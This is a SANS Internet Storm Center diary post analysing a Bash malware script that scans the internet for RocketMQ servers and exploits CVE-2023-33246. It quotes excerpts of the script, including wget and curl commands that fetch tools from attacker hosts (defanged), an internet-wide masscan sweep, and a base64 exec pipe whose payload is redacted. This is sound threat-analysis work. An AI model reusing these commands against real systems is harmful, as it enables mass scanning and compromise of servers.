An Example of RocketMQ Exploit Scanner, (Sat, Dec 16th)

Category :

SANS Full Feed

Posted On :

A few months ago, RocketMQ[1], a real-time message queue platform, suffered of a nasty vulnerability referred as %%cve:2023-33246%%. I found another malicious script in the wild a few weeks ago that exploits this vulnerability. It has still today a very low VirusTotal detection score:2/60 [2] (SHA256:70710c630390dbf74a97162ab61aae78d3e18eacb41e16d3dd6bbd872fee66c5).

This script is a Bash script has two main parts: First, it will prepare its environment by creating a random directory:

rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ”); if [ -z ${rand} ]; then rand=’.tmp’; fi
echo “${rand}” > “$(pwd)/.${rand}” 2>/dev/null && LPATH=”$(pwd)/.cache/”; ${rm} -f “$(pwd)/.${rand}” >/dev/null 2>&1
echo “${rand}” > “/tmp/.${rand}” 2>/dev/null && LPATH=”/tmp/.cache/”; ${rm} -f “/tmp/.${rand}” >/dev/null 2>&1
echo “${rand}” > “/usr/local/bin/.${rand}” 2>/dev/null && LPATH=”/usr/local/bin/.cache/”; ${rm} -f “/usr/local/bin/.${rand}” >/dev/null 2>&1
echo “${rand}” > “${HOME}/.${rand}” 2>/dev/null && LPATH=”${HOME}/.cache/”; ${rm} -f “${HOME}/.${rand}” >/dev/null 2>&1
mkdir -p ${LPATH} >/dev/null 2>&1

Then, it will install some dependencies using yum or apt. The dependencies will allow the tool to download and compile on the fly a copy of the masscan[3] port scanner:

if [ ! -d ${LPATH}masscan ]; then
echo “Downloading masscan.tar.gz..”
wget -qO ${LPATH}masscan.tar.gz hxxp://149[.]28[.]85[.]17:80/wp-content/themes/twentyseventeen/masscan.tar.gz
tar -C ${LPATH} -zxf ${LPATH}masscan.tar.gz
rm ${LPATH}masscan.tar.gz
make clean -C ${LPATH}masscan >/dev/null 2>&1
make -C ${LPATH}masscan >/dev/null 2>&1
elif [ -f ${LPATH}masscan/bin/masscan ]; then
echo “Masscan existed already in ${LPATH}”
if [ ! -f ${LPATH}.masscan ]; then
curl –retry 5 -sLk hxxp://203[.]55[.]135[.]12/wp-content/themes/twentyfifteen/masscan -o ${LPATH}.masscan
chmod 755 ${LPATH}.masscan

if [[ “” == “${masscan}” ]]; then

Masscan is very powerfull to quickly scan the complete IPv4 address space for a specific port. That’s what the script does. It scan the Internet and searches for the following open ports: 10911,10909. These are used by RocketMQ. The masscan results will be passed to a Python script using a pipe:

${sudo} ${masscan} –shard 17/20 –rate 30000 –exclude-range -p10911,10909 | python3 -c “import base64;exec(base64.b64decode(‘…redatcted…’))”

The Python script has been redacted but, for every IP reported by masscan, it starts a thread to try to exploit the server. 

Something funny I found in the Python script: The attacker reused (or forked) the code because it also contains other exploits:

remnux@remnux:/MalwareZoo/20231216$ grep module_
def ZZZZmodule_scan_bigip(self, ip, port):
def ZZZZmodule_scan_webmin(self, ip, port):
def module_scan_rocketmq(self, ip, port):
def ZZZmodule_scan_wordpress(self, ip, port):
def ZZZZmodule_scan_webuzo(self, ip, port):

The one starting with “ZZZ” have been disabled.


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.